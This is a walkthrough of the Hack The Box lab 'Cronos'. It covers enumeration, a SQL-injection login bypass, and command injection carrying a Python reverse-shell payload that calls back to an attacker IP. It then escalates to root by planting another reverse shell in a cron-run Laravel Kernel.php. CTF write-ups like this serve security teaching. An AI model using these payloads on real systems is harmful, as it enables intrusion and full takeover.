Cronos

This time we are solving Cronos from Hack the box! I really enjoyed this box, no bullsit parts in my opinion, let's get started!

First off let's run nmap on target:

mkdir nmap
sudo nmap -sC -sV -oA nmap/ -T4 10.129.30.241

Here we can see the result: nmap-cronos

There's ports 20, 53 and 80 open. Let's ignore port 22 for now since usually we need credentials or ssh keys to be able to utilize ssh. Port 53 would indicate that we have to deal with some vhosts. Let's check the web app on port 80!

apache-welcome-page

Not much to go on. Initially I started running gobuster on background but I also added cronos.htb to my /etc/hosts file since .htb is pretty common hostname on these HTB machines. So let's add that entry! Type:

  nano /etc/hosts

On terminal and add the entry!

etc-hosts

We should also run a gobuster with vhost-mode to potentially reveal more vhosts. We can do that with the command:

gobuster vhost -u http://cronos.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt

From the results we will find a new vhost!

cronos-gobuster-results

Sweet, we should also add that entry to our /etc/hosts file and our hosts file should look something like this:

cronos-etc-hosts-final

Now when we visit those pages with browser we see two different web apps! We going to skip the cronos.htb one since it (SPOILER ALERT) contains nothing useful (YET). The admin.cronos.htb on the other hand has a login form. I tried logging in with some random credentials and even brute forced with small wordlists with no luck. Happily this form has a SQL-injection on username field. We can exploit this by simply entering our username as:

  admin ' OR 1 = 1 -- -

and we can leave the password field empty. Neat, we got in! Now there's some kind of a "Net tool" on the page that we can execute commands on. As soon as I saw the form I knew there would be a way to execute arbitrary commands on the system. And i was right! We can do this by intercepting the request with Burpsuite. Before we do that, let's setup a netcat listener:

  nc -lnvp 9005

Now, it's time to intercept the request and modify the POST parameters to contain ingredients of a reverse shell:

cronos-burp-rce

You can copy the post params from here:

command=python&host= -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.98",9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Aaaand we are IN! Let's make this a real shell real quick:

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg

We already have access to user.txt, It's located in "noulis"-user's home-directory. Now would be a good time to enumerate with either linPEAS or linenum, but let's skip that and go for the solution, shall we? (Note: I found the next step via linenum). So, the cronos.htb site which had nothing visible to us earlier is made with Php framework Laravel. Laravel is actually a pretty cool thing, it even makes coding php not so horrible :). Anyway, the system has a cron job:

  /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 

which runs Laravel scheduled commands! And the best part is that cron is run by root! AND we can modify those Laravel files, so we have full access to execute whatever we want!

Let's exploit this flaw by modifying the file that handles Laravel-commands: /var/www/laravel/app/Console/Kernel.php

We could use a similiar technique we used earlier to obtain this shell, let's modify the schedule-method of Kernel.php to be like this:

  protected function schedule(Schedule $schedule)
{
    $command =  "python -c'".'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.98",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'."'";
    shell_exec($command);

    // $schedule->command('inspire')
    //          ->hourly();
}

Now, let's setup another netcat listener on our machine and wait for a reverse shell.

nc -lnvp 1338

In about a minute we should receive a connection and a shell session as root! Box done